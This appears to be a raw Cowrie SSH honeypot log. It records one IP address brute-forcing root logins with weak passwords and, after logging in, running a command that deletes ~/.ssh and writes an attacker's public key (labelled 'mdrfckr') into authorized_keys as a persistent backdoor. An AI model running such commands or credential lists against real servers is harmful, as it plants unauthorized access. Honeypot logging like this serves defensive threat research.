{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:07:07.620445Z","src_ip":"212.227.235.229","session":"afc571b15a35"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:07:09.227916Z","src_ip":"212.227.235.229","session":"afc571b15a35"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:10.483875Z","src_ip":"212.227.235.229","session":"afc571b15a35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42516,"dst_ip":"1.2.3.4","dst_port":22,"session":"42b4e1cc2d58","protocol":"ssh","message":"New connection: 212.227.235.229:42516 (1.2.3.4:22) [session: 42b4e1cc2d58]","sensor":"my-vps","timestamp":"2025-09-08T22:07:10.736171Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:07:10.736977Z","src_ip":"212.227.235.229","session":"42b4e1cc2d58"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56540,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5870ad524ea","protocol":"ssh","message":"New connection: 212.227.235.229:56540 (1.2.3.4:22) [session: f5870ad524ea]","sensor":"my-vps","timestamp":"2025-09-08T22:07:10.957639Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:07:10.959229Z","src_ip":"212.227.235.229","session":"f5870ad524ea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:07:10.987241Z","src_ip":"212.227.235.229","session":"42b4e1cc2d58"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:07:11.211764Z","src_ip":"212.227.235.229","session":"f5870ad524ea"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:07:12.034253Z","src_ip":"212.227.235.229","session":"42b4e1cc2d58"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"root123456","message":"login attempt [ubuntu/root123456] failed","sensor":"my-vps","timestamp":"2025-09-08T22:07:12.264196Z","src_ip":"212.227.235.229","session":"f5870ad524ea"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:12.288842Z","src_ip":"212.227.235.229","session":"f2e78d743f59"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:12.289974Z","src_ip":"212.227.235.229","session":"42b4e1cc2d58"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:13.519378Z","src_ip":"212.227.235.229","session":"f5870ad524ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60556,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc42809420ca","protocol":"ssh","message":"New connection: 212.227.235.229:60556 (1.2.3.4:22) [session: fc42809420ca]","sensor":"my-vps","timestamp":"2025-09-08T22:07:22.372890Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:07:22.373534Z","src_ip":"212.227.235.229","session":"fc42809420ca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:07:22.684068Z","src_ip":"212.227.235.229","session":"fc42809420ca"}
{"eventid":"cowrie.login.success","username":"root","password":"qwer123","message":"login attempt [root/qwer123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:07:23.964611Z","src_ip":"212.227.235.229","session":"fc42809420ca"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:07:24.604659Z","src_ip":"212.227.235.229","session":"fc42809420ca"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:07:24.605398Z","src_ip":"212.227.235.229","session":"fc42809420ca"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:07:24.606641Z","src_ip":"212.227.235.229","session":"fc42809420ca"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:24.917598Z","src_ip":"212.227.235.229","session":"fc42809420ca"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:07:25.644291Z","src_ip":"212.227.235.229","session":"fc42809420ca"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:07:25.645147Z","src_ip":"212.227.235.229","session":"fc42809420ca"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:07:25.955154Z","src_ip":"212.227.235.229","session":"fc42809420ca"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:25.956156Z","src_ip":"212.227.235.229","session":"fc42809420ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60562,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cbbdb5178f5","protocol":"ssh","message":"New connection: 212.227.235.229:60562 (1.2.3.4:22) [session: 9cbbdb5178f5]","sensor":"my-vps","timestamp":"2025-09-08T22:07:26.267808Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:07:26.268676Z","src_ip":"212.227.235.229","session":"9cbbdb5178f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:07:26.580432Z","src_ip":"212.227.235.229","session":"9cbbdb5178f5"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:07:27.867976Z","src_ip":"212.227.235.229","session":"9cbbdb5178f5"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:29.181334Z","src_ip":"212.227.235.229","session":"9cbbdb5178f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57538,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3995e367372","protocol":"ssh","message":"New connection: 212.227.235.229:57538 (1.2.3.4:22) [session: a3995e367372]","sensor":"my-vps","timestamp":"2025-09-08T22:07:29.488392Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:07:29.489025Z","src_ip":"212.227.235.229","session":"a3995e367372"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:07:29.799984Z","src_ip":"212.227.235.229","session":"a3995e367372"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:07:31.083626Z","src_ip":"212.227.235.229","session":"a3995e367372"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:31.396273Z","src_ip":"212.227.235.229","session":"a3995e367372"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:31.397149Z","src_ip":"212.227.235.229","session":"fc42809420ca"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56142,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8f0a4d3509d","protocol":"ssh","message":"New connection: 212.227.235.229:56142 (1.2.3.4:22) [session: b8f0a4d3509d]","sensor":"my-vps","timestamp":"2025-09-08T22:07:39.467036Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:07:39.467911Z","src_ip":"212.227.235.229","session":"b8f0a4d3509d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:07:39.641567Z","src_ip":"212.227.235.229","session":"b8f0a4d3509d"}
{"eventid":"cowrie.login.success","username":"root","password":"8812345","message":"login attempt [root/8812345] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:07:40.379126Z","src_ip":"212.227.235.229","session":"b8f0a4d3509d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:07:40.784324Z","src_ip":"212.227.235.229","session":"b8f0a4d3509d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:07:40.785001Z","src_ip":"212.227.235.229","session":"b8f0a4d3509d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:07:40.786068Z","src_ip":"212.227.235.229","session":"b8f0a4d3509d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:40.961485Z","src_ip":"212.227.235.229","session":"b8f0a4d3509d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:07:41.327132Z","src_ip":"212.227.235.229","session":"b8f0a4d3509d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:07:41.327856Z","src_ip":"212.227.235.229","session":"b8f0a4d3509d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:07:41.503989Z","src_ip":"212.227.235.229","session":"b8f0a4d3509d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:07:41.504858Z","src_ip":"212.227.235.229","session":"b8f0a4d3509d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56148,"dst_ip":"1.2.3.4","dst_port":22,"session":"9276e43071b3","protocol":"ssh","message":"New connection: 212.227.235.229:56148 (1.2.3.4:22) [session: 9276e43071b3]","sensor":"my-vps","timestamp":"2025-09-08T22:07:41.685764Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:07:41.686755Z","src_ip":"212.227.235.229","session":"9276e43071b3"}
